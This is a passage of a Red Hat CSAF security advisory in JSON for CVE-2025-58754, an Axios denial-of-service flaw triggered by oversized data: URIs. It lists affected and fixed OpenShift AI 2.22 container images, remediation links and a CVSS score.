"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2394735"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.\nThis path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: \u0027stream\u0027.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios DoS via lack of data size check",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Availability impact is limited to the application which bundles axios and not the host Red Hat system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "RHBZ#2394735",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394735"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593",
"url": "https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/pull/7011",
"url": "https://github.com/axios/axios/pull/7011"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.12.0",
"url": "https://github.com/axios/axios/releases/tag/v1.12.0"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj",
"url": "https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"
}
],
"release_date": "2025-09-12T01:16:40.513000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
